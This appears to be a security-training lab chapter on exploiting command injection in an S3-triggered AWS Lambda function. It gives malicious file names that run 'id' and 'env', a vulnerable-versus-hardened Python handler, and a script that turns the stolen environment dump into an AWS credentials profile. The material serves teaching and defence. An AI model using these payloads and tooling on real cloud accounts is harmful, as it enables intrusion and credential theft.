# Attacking AWS Lambda via Triggers

## Introduction

Lambda is an event-driven serverless compute service that runs your code on compute resources fully managed by AWS.

Lambda functions can be triggered by events from many AWS services. A common trigger is Amazon S3: a function can be invoked on an S3 event such as an object being created or deleted.

## What are we going to cover?

This chapter covers an attack that starts with an upload to AWS S3 and ends with command execution inside, and credential theft from, an AWS Lambda function.

## Steps to set up the Lab

There are three AWS services involved in this attack scenario:

1. AWS S3
2. AWS Lambda
3. AWS Simple Notification Service

The user flow for this lab begins when a user uploads a PNG image file (`*.png`) to a bucket. A Lambda function called `bucket-write-md5-calc` runs when an image upload to the bucket succeeds. The function fetches a copy of the object from the bucket and computes its MD5 sum, which is then emailed to the addresses subscribed to the SNS topic configured as the function's destination.

To set up the lab, open a terminal **on the student machine** and perform the following steps:

1. Download the setup script by running the command - `wget -q https://access-appsecco-training.s3.amazonaws.com/lambdatriggers.sh -O ~/Downloads/lambdatriggers.sh`
2. Switch to the downloads directory - `cd ~/Downloads/`
3. Execute the script - `bash lambdatriggers.sh`

Next, create an SNS email subscription so that the function's output is delivered to your inbox. **Replace the `<EMAIL-ADDRESS>` placeholder in the command below.**

```
# Account ID of the calling identity; --query avoids the jq/awk parsing of the ARN
export AWS_ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
# $bapname is not set on this page: it must hold the per-student suffix used in the topic name
aws sns subscribe --topic-arn "arn:aws:sns:us-east-1:$AWS_ACCOUNT_ID:lambdatrigger-s3write-$bapname" --protocol email --notification-endpoint <EMAIL-ADDRESS>
```

Confirm the subscription from the email you receive in your inbox to complete the lab setup.

## Steps to attack

### Confirming the vulnerability

1. Navigate to `https://s3.console.aws.amazon.com/s3/buckets?region=us-east-1`
2. Open the bucket whose name starts with `resume-bucket-lambda-trigger-`
3. Use the upload button to upload `bird.jpg`. Notice that the MD5 sum of `bird.jpg` arrives in your inbox.
4. The function builds a shell command from the name of the uploaded object, so a file name containing shell metacharacters such as `;` is interpreted as additional commands: this is command injection through the S3 object key.
5. Upload a file named `image.png;id;w` (a valid file name on Linux). The shell runs the MD5 computation on `image.png`, then `id`, then `w`.
6. Notice that the output of the `id` command is now sent to your inbox.
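To make the injection concrete, the following added example (written for this page, not the lab's own function code) puts the injectable pattern next to a hardened handler. It assumes the lab function splices the decoded S3 object key into a shell command line such as `md5sum <key>`; the bucket name, the event shape and the local directory standing in for S3 are constructed so the example runs offline. Note that S3 URL-encodes the key in the event, so `;` arrives as `%3B` and must be decoded before the name reaches the shell, which is what makes the `image.png;id;w` upload work.

```python
import hashlib
import os
import subprocess
import tempfile
import urllib.parse

# Constructed sample of an s3:ObjectCreated event record. The bucket name and key are
# assumptions for this example. S3 URL-encodes the key: ';' arrives as '%3B', ' ' as '+'.
SAMPLE_EVENT = {
    "Records": [{
        "eventName": "ObjectCreated:Put",
        "s3": {
            "bucket": {"name": "resume-bucket-lambda-trigger-example"},
            "object": {"key": "bird.jpg%3Becho+INJECTED"},
        },
    }]
}


def object_key(event: dict) -> str:
    """Decode the key the way a handler must before it can use it as a file name."""
    return urllib.parse.unquote_plus(event["Records"][0]["s3"]["object"]["key"])


def make_lab_dir() -> str:
    """Stand-in for the bucket: a temp dir holding the 'downloaded' objects.
    Both the benign upload and the injected file name contain the bytes b'hello'."""
    workdir = tempfile.mkdtemp()
    for name in ("bird.jpg", "bird.jpg;echo INJECTED"):
        with open(os.path.join(workdir, name), "wb") as f:
            f.write(b"hello")
    return workdir


def vulnerable_md5(key: str, workdir: str) -> str:
    """The injectable pattern: the object key is spliced into a shell command line.
    With key 'bird.jpg;echo INJECTED' the shell runs md5sum, then echo.
    The lab's 'image.png;id;w' upload works the same way (md5sum, then id, then w)."""
    cmd = f"md5sum {key}"
    out = subprocess.run(cmd, shell=True, cwd=workdir, capture_output=True, text=True)
    return out.stdout


def safe_md5(key: str, workdir: str) -> str:
    """Hardened form: no shell at all. The key is only used to open the object and the
    digest is computed in-process, so metacharacters in the name are inert.
    (If md5sum must be kept, subprocess.run(["md5sum", key]) without shell=True is
    equally safe: the name is passed as one argv element, never parsed by a shell.)"""
    digest = hashlib.md5()
    with open(os.path.join(workdir, key), "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def handler(event: dict, workdir: str, hardened: bool = True) -> str:
    """Minimal handler returning the text the lab function would publish to SNS."""
    key = object_key(event)
    return safe_md5(key, workdir) if hardened else vulnerable_md5(key, workdir)


if __name__ == "__main__":
    lab = make_lab_dir()
    print("vulnerable:", repr(handler(SAMPLE_EVENT, lab, hardened=False)))
    print("hardened:  ", handler(SAMPLE_EVENT, lab))
```

Run on Linux (Lambda's runtime is Linux and `md5sum` is assumed to exist): the vulnerable path returns the digest line followed by `INJECTED`, the hardened path returns only the 32-character digest of the file's bytes regardless of what the name contains.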

### Credential Exfiltration

1. Make a copy of `bird.jpg` whose name runs `env` to print the function's environment variables: `cp bird.jpg 'bird.jpg;env;w'`
2. Upload this new file to the same bucket; the upload triggers the Lambda function.
3. Check your email. The Lambda runtime hands the execution role's temporary credentials to the function as the environment variables `AWS_ACCESS_KEY_ID`, `AWS_SECRET_ACCESS_KEY` and `AWS_SESSION_TOKEN`, so they appear in the dump.

Configure these credentials as you would any other stolen credentials. Because they are temporary STS credentials, all three values are needed, including the session token. Then start with identifying what access the role has and move on to accessing other resources in the AWS account.
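The following added example (not part of the original page) turns the `env` dump received by email into an AWS CLI credentials profile, refusing to continue when any of the three values is missing, which is the usual mistake when people copy only the key ID and secret. The dump text is constructed with placeholder values; the variable names are the ones the Lambda runtime really sets. The profile name `lambda-stolen` is an assumption.

```python
# Constructed sample of an `env` dump as mailed by the lab function. The values are
# placeholders, not real credentials; the variable names match the Lambda runtime.
SAMPLE_ENV_DUMP = """\
AWS_LAMBDA_FUNCTION_NAME=bucket-write-md5-calc
AWS_REGION=us-east-1
AWS_ACCESS_KEY_ID=ASIAEXAMPLEKEYID00001
AWS_SECRET_ACCESS_KEY=EXAMPLEsecretKEYdoNotUse0123456789abcdef
AWS_SESSION_TOKEN=EXAMPLEsessionTOKEN/abc+123==
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=128
LAMBDA_TASK_ROOT=/var/task
"""

# Temporary (STS) credentials need all three; a stolen pair without the token is useless.
REQUIRED = ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")


def parse_env_dump(text: str) -> dict:
    """Pull the credential variables out of an `env` dump (KEY=VALUE per line).
    Only the first '=' splits, because session tokens can contain '=' padding."""
    creds = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() in REQUIRED:
            creds[key.strip()] = value.strip()
    missing = [k for k in REQUIRED if k not in creds]
    if missing:
        raise ValueError(f"incomplete credential set, missing: {', '.join(missing)}")
    return creds


def is_temporary(creds: dict) -> bool:
    """Access key IDs of temporary credentials start with ASIA, long-term ones with AKIA."""
    return creds["AWS_ACCESS_KEY_ID"].startswith("ASIA")


def credentials_profile(creds: dict, name: str = "lambda-stolen") -> str:
    """Render a ~/.aws/credentials section, session token included."""
    return (
        f"[{name}]\n"
        f"aws_access_key_id = {creds['AWS_ACCESS_KEY_ID']}\n"
        f"aws_secret_access_key = {creds['AWS_SECRET_ACCESS_KEY']}\n"
        f"aws_session_token = {creds['AWS_SESSION_TOKEN']}\n"
    )


if __name__ == "__main__":
    found = parse_env_dump(SAMPLE_ENV_DUMP)
    print("temporary credentials:", is_temporary(found))
    print(credentials_profile(found))
```

Append the rendered section to `~/.aws/credentials` and confirm what you hold with `aws sts get-caller-identity --profile lambda-stolen`; the returned ARN names the execution role, which is where enumeration of its permissions starts. Temporary credentials expire, so work quickly or repeat the upload to get a fresh set.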

### Additional references

* [Lambda Trigger with S3](https://docs.aws.amazon.com/lambda/latest/dg/with-s3-example.html)

